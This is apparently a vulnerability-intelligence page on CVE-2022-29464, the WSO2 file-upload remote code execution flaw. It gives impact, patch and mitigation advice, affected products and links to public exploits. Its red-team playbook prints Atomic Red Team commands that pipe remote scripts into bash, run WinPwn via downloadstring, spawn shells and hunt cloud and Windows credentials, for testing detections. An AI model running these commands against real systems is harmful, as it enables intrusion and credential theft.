CVE-2022-29464
Overview
This vulnerability is an arbitrary file upload flaw caused by improper validation of the Content-Disposition header in HTTP requests. The affected component is the /fileupload endpoint in multiple WSO2 products, where directory traversal sequences within the filename parameter allow writing files outside the intended upload directory. This enables attackers to place files under the web root directory, bypassing normal file upload restrictions.
Vulnerability Description
Certain WSO2 products allow unrestricted file upload with resultant remote code execution. The attacker must use a /fileupload endpoint with a Content-Disposition directory traversal sequence to reach a directory under the web root, such as a ../../../../repository/deployment/server/webapps directory. This affects WSO2 API Manager 2.2.0 up to 4.0.0, WSO2 Identity Server 5.2.0 up to 5.11.0, WSO2 Identity Server Analytics 5.4.0, 5.4.1, 5.5.0 and 5.6.0, WSO2 Identity Server as Key Manager 5.3.0 up to 5.11.0, WSO2 Enterprise Integrator 6.2.0 up to 6.6.0, WSO2 Open Banking AM 1.4.0 up to 2.0.0 and WSO2 Open Banking KM 1.4.0, up to 2.0.0.
Impact
An unauthenticated attacker can upload and execute arbitrary JSP files on the affected server, resulting in full remote code execution. This allows complete compromise of the system, including access to sensitive data, lateral movement within the network, and persistent control over the environment. No user interaction or valid credentials are required to exploit this vulnerability, significantly increasing the attack surface and risk of widespread damage.
Solution
WSO2 has released security advisories detailing patches for affected products, including API Manager versions beyond 4.0.0, Identity Server versions above 5.11.0, and Enterprise Integrator versions above 6.6.0. Administrators should apply the updates referenced in the WSO2 Security Advisory WSO2-2021-1738 available at https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2021-1738. Until patches are applied, restricting access to the /fileupload endpoint and validating Content-Disposition headers are recommended as temporary mitigations.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in certain WSO2 products stems from an unrestricted file upload feature that allows attackers to exploit directory traversal sequences. By manipulating the Content-Disposition header in a file upload request, an attacker can navigate the file system and upload malicious files to sensitive directories, such as those under the web root. This flaw enables remote code execution, as the uploaded files can be executed by the server, leading to a complete compromise of the affected system. The severity of this vulnerability is underscored by its high CVSS score, indicating a critical risk to the integrity and confidentiality of the affected applications.
Attack vectors for this vulnerability are primarily centered around the /fileupload endpoint. An attacker can craft a request that includes a directory traversal sequence, such as "../../../../", to escape the intended upload directory and reach sensitive areas of the file system. Once the attacker successfully uploads a malicious file, they can execute arbitrary code on the server. This exploitation can be achieved without authentication, making it particularly dangerous as it allows unauthenticated users to gain control over the server. Scenarios may include uploading web shells, backdoors, or other forms of malware that can be leveraged for further attacks, such as data exfiltration or lateral movement within the network.
The real-world impact of this vulnerability is significant, especially for organizations relying on the affected WSO2 products for API management, identity services, and enterprise integration. A successful exploitation could lead to unauthorized access to sensitive data, disruption of services, and potential regulatory non-compliance, particularly in industries that handle personal or financial information. The business risks include reputational damage, financial losses from remediation efforts, and potential legal consequences stemming from data breaches. Moreover, the ability to execute arbitrary code on a server can lead to a complete takeover of the infrastructure, allowing attackers to pivot to other systems within the organization.
To detect and mitigate this vulnerability, organizations should implement a multi-layered security approach. First, it is essential to conduct a thorough inventory of all WSO2 products in use and assess their exposure to this vulnerability. Regular security assessments, including penetration testing and code reviews, can help identify and remediate potential weaknesses. Additionally, organizations should enforce strict file upload validation mechanisms, ensuring that only allowed file types are accepted and that file paths are properly sanitized to prevent directory traversal. Implementing web application firewalls (WAFs) can also provide an additional layer of protection by filtering out malicious requests before they reach the application.
In conclusion, the unrestricted file upload vulnerability in WSO2 products presents a critical risk that organizations must address promptly. By understanding the technical details, potential attack vectors, and real-world implications, cybersecurity professionals can better prepare their defenses against such threats. Proactive detection and mitigation strategies, combined with a robust security posture, are essential to safeguard against the exploitation of this vulnerability and to protect sensitive data and systems from compromise.
CSURFACE threat intelligence has detected a slight increase in exploitation attempts targeting CVE-2022-29464, accompanied by the emergence of several new proof-of-concept tools that simplify leveraging the vulnerability. This development reflects a modest expansion of the exploit landscape, making it more accessible for a broader range of threat actors, including ransomware groups known to exploit this flaw. Our telemetry indicates that the Exploit Prediction Scoring System (EPSS) score has reached its maximum, signaling a peak likelihood of exploitation in the near term. While the overall exploitation trend remains steady without a rapid surge, the availability of enhanced tooling and sustained attacker interest underscores a persistent and credible threat. Consequently, the risk level for organizations using affected WSO2 products remains critically high, necessitating continued vigilance in detection and response efforts.
Affected Products (11)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Wso2 | Api Manager | All |
cpe:2.3:a:wso2:api_manager:*:*:*:*:*:*:*:*
|
|
|
Wso2 | Enterprise Integrator | All |
cpe:2.3:a:wso2:enterprise_integrator:*:*:*:*:*:*:*:*
|
|
|
Wso2 | Identity Server | All |
cpe:2.3:a:wso2:identity_server:*:*:*:*:*:*:*:*
|
|
|
Wso2 | Identity Server Analytics | 5.4.0 |
cpe:2.3:a:wso2:identity_server_analytics:5.4.0:*:*:*:*:*:*:*
|
|
|
Wso2 | Identity Server Analytics | 5.4.1 |
cpe:2.3:a:wso2:identity_server_analytics:5.4.1:*:*:*:*:*:*:*
|
|
|
Wso2 | Identity Server Analytics | 5.5.0 |
cpe:2.3:a:wso2:identity_server_analytics:5.5.0:*:*:*:*:*:*:*
|
|
|
Wso2 | Identity Server Analytics | 5.6.0 |
cpe:2.3:a:wso2:identity_server_analytics:5.6.0:*:*:*:*:*:*:*
|
|
|
Wso2 | Identity Server As Key Manager | All |
cpe:2.3:a:wso2:identity_server_as_key_manager:*:*:*:*:*:*:*:*
|
|
|
Wso2 | Open Banking Am | All |
cpe:2.3:a:wso2:open_banking_am:*:*:*:*:*:*:*:*
|
|
|
Wso2 | Open Banking Iam | 2.0.0 |
cpe:2.3:a:wso2:open_banking_iam:2.0.0:*:*:*:*:*:*:*
|
|
|
Wso2 | Open Banking Km | All |
cpe:2.3:a:wso2:open_banking_km:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
WSO2 Arbitrary File Upload to RCE
exploits/multi/http/wso2_file_upload_rce
|
Orange Tsai, hakivvi, wvu | Unknown | - | View |
GitHub PoCs (31)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
hakivvi/CVE-2022-29464
WSO2 RCE (CVE-2022-29464) exploit and writeup.
|
hakivvi | 377 | 87 | 2022-04-20 | View |
|
0xdsm/WSOB
😭 WSOB is a python tool created to exploit the new vulnerability on WSO2 assigned as CVE-2022-29464.
|
0xdsm | 28 | 10 | 2022-04-24 | View |
|
SystemVll/CVE-2022-29464
A bots loader for CVE-2022-29464 with multithreading
|
SystemVll | 11 | 4 | 2022-05-15 | View |
|
sh4den/CVE-2022-29464
A bots loader for CVE-2022-29464 with multithreading
|
sh4den | 10 | 4 | 2022-05-15 | View |
|
Ap0dexMe0/CVE-2022-29464
Perform With Mass Exploits In WSO Management.
|
Ap0dexMe0 | 9 | 3 | 2023-04-25 | View |
|
ThatNotEasy/CVE-2022-29464
Perform With Mass Exploits In WSO Management.
|
ThatNotEasy | 9 | 3 | 2023-04-25 | View |
|
hxlxmj/Mass-exploit-CVE-2022-29464
Mass Exploit for CVE 2022-29464 on Carbon
|
hxlxmj | 1 | 7 | 2022-06-28 | View |
|
gbrsh/CVE-2022-29464
RCE exploit for WSO2
|
gbrsh | 7 | 1 | 2022-11-14 | View |
|
jimidk/Better-CVE-2022-29464
CVE-2022-29464 PoC for WSO2 products
|
jimidk | 5 | 2 | 2022-06-04 | View |
|
Lidong-io/cve-2022-29464
cve-2022-29464 批量脚本
|
Lidong-io | 5 | 2 | 2022-04-22 | View |
|
r4x0r1337/-CVE-2022-29464
|
r4x0r1337 | 4 | 2 | 2022-08-01 | View |
|
gpiechnik2/nmap-CVE-2022-29464
Repository containing nse script for vulnerability CVE-2022-29464 known as WSO2 RCE.
|
gpiechnik2 | 3 | 3 | 2022-04-22 | View |
|
hev0x/CVE-2022-29464
WSO2 RCE (CVE-2022-29464)
|
hev0x | 5 | 1 | 2022-04-22 | View |
|
Chocapikk/CVE-2022-29464
Python script to exploit CVE-2022-29464 (mass mode)
|
Chocapikk | 5 | 1 | 2022-05-26 | View |
|
hupe1980/CVE-2022-29464
WSO2 Arbitrary File Upload to Remote Command Execution (RCE)
|
hupe1980 | 3 | 1 | 2022-09-22 | View |
|
superzerosec/CVE-2022-29464
CVE-2022-29464 POC exploit
|
superzerosec | 2 | 2 | 2022-04-29 | View |
|
mr-r3bot/WSO2-CVE-2022-29464
Pre-auth RCE bug CVE-2022-29464
|
mr-r3bot | 2 | 1 | 2022-04-21 | View |
|
amit-pathak009/CVE-2022-29464-mass
|
amit-pathak009 | 1 | 2 | 2022-08-13 | View |
|
tufanturhan/wso2-rce-cve-2022-29464
|
tufanturhan | 2 | 0 | 2022-04-21 | View |
|
0xAgun/CVE-2022-29464
|
0xAgun | 1 | 1 | 2022-04-22 | View |
|
axin2019/CVE-2022-29464
1
|
axin2019 | 1 | 1 | 2022-05-05 | View |
|
Pasch0/WSO2RCE
CVE-2022-29464 Exploit
|
Pasch0 | 1 | 0 | 2022-07-05 | View |
|
amit-pathak009/CVE-2022-29464
|
amit-pathak009 | 0 | 1 | 2022-08-13 | View |
|
Pushkarup/CVE-2022-29464
A PoC and Exploit for CVE 2022-29464
|
Pushkarup | 1 | 0 | 2023-10-24 | View |
|
devengpk/CVE-2022-29464
|
devengpk | 1 | 0 | 2022-12-18 | View |
|
cc3305/CVE-2022-29464
CVE-2022-29464 exploit script
|
cc3305 | 0 | 1 | 2024-06-07 | View |
|
LinJacck/CVE-2022-29464
cve-2022-29464 EXP
|
LinJacck | 1 | 0 | 2022-05-07 | View |
|
SynixCyberCrimeMy/CVE-2022-29464
SynixCyberCrimeMY CVE Exploiter By SamuraiMelayu1337 & ?/h4zzzzzz.scc
|
SynixCyberCrimeMy | 0 | 1 | 2023-11-16 | View |
|
h3x0v3rl0rd/CVE-2022-29464
|
h3x0v3rl0rd | 0 | 0 | 2022-04-24 | View |
|
lowkey0808/cve-2022-29464
|
lowkey0808 | 0 | 0 | 2022-04-26 | View |
|
c1ph3rbyt3/CVE-2022-29464
|
c1ph3rbyt3 | 0 | 0 | 2025-01-17 | View |
Threat Feed
33 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (6)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2022-29464 |
| openwall.com |
GitHub CVE
mailing-list
|
http://www.openwall.com/lists/oss-security/2022/04/22/7 |
| github.com |
GitHub CVE
|
https://github.com/hakivvi/CVE-2022-29464 |
| packetstormsecurity.com |
GitHub CVE
|
http://packetstormsecurity.com/files/166921/WSO-Arbitrary-File-Upload-Remote-Code-Execution.html |
| security.docs.wso2.com |
GitHub CVE
|
https://security.docs.wso2.com/en/latest/security-announcements/security-advisories/2022/WSO2-2021-1738/ |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2022-29464 |